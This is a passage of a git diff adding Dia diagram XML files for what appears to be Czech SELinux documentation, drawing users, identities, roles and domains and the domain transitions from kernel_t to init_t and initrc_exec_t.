+        <dia:connection handle="1" to="O2" connection="1"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="16.375,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.4548,4.89482;16.4452,7.42313"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="16.375,4.965"/>
+        <dia:point val="14.525,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="13"/>
+        <dia:connection handle="1" to="O2" connection="3"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,9.185;6.8618,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="6.5,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O5" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.43464,9.16964;12.3032,11.7144"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="12.2,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="0"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,9.185;14.0868,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,9.235"/>
+        <dia:point val="13.725,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O2" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,13.455;6.8618,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,13.505"/>
+        <dia:point val="6.5,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O5" connection="13"/>
+        <dia:connection handle="1" to="O6" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O16">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,13.455;14.0868,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,13.505"/>
+        <dia:point val="13.725,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="13"/>
+        <dia:connection handle="1" to="O7" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O17">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,4.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,3.655;23.52,4.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Unix users#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,4.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O18">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,8.09"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,7.47637;23.1936,9.07725"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SELinux
+Identities#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,8.09"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O19">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,12.74"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,12.1264;21.7111,12.9273"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Roles#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,12.74"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O20">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,16.99"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,16.3764;22.4911,17.1772"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Domain#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,16.99"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O21">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,13.8575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,13.8075;21.3118,15.8693"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,13.8575"/>
+          <dia:point val="20.95,15.7575"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O22">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,14.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,14.4071;25.2636,15.2079"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,15.0207"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O23">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,9.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,9.7575;21.3118,11.8193"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,9.8075"/>
+          <dia:point val="20.95,11.7075"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O24">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,10.7575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,10.3571;24.5511,11.1579"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to N#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,10.9707"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O25">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,5.33625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,5.28625;21.3118,7.34805"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,5.33625"/>
+          <dia:point val="20.95,7.23625"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O26">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,6.28625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,5.88581;25.2636,6.68669"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,6.49944"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+  </dia:layer>
+</dia:diagram>
diff --git a/tmp/cs-CZ/html/images/selinux-context.png b/tmp/cs-CZ/html/images/selinux-context.png
new file mode 100644
index 000000000..debe7305d
Binary files /dev/null and b/tmp/cs-CZ/html/images/selinux-context.png differ
diff --git a/tmp/cs-CZ/html/images/selinux-transitions.dia b/tmp/cs-CZ/html/images/selinux-transitions.dia
new file mode 100644
index 000000000..91f55fb86
--- /dev/null
+++ b/tmp/cs-CZ/html/images/selinux-transitions.dia
@@ -0,0 +1,741 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.0325,2.2;6.775,5"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6425000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Kernel
+kernel_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,3.395"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.90375,0.839375"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.59375,0.244375;7.21375,1.78938"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Processes
+and domains#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,0.839375"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.3498,0.848125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.2048,0.2345;15.5134,1.83537"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Objects and
+types#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3498,0.848125"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.05375,5.995;6.75375,8.795"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Init
+init_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,7.19"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.7236,2.84;15.9936,6.25995"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1699999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/sbin/init
+init_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,3.89355"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.725,3.6"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.67485,3.2485;10.8854,3.9721"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.725,3.6"/>
+        <dia:point val="10.7736,3.61213"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="8"/>
+        <dia:connection handle="1" to="O4" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,5.0564"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.60026,4.9912;10.8388,6.83278"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7736,5.0564"/>
+        <dia:point val="6.70375,6.72"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="7"/>
+        <dia:connection handle="1" to="O3" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6986,6.9625;16.0186,10.3824"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2200000000000006"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/etc/init.d/rcS
+initrc_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,8.01605"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="1.9575,9.79;7.85,12.59"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.7924999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
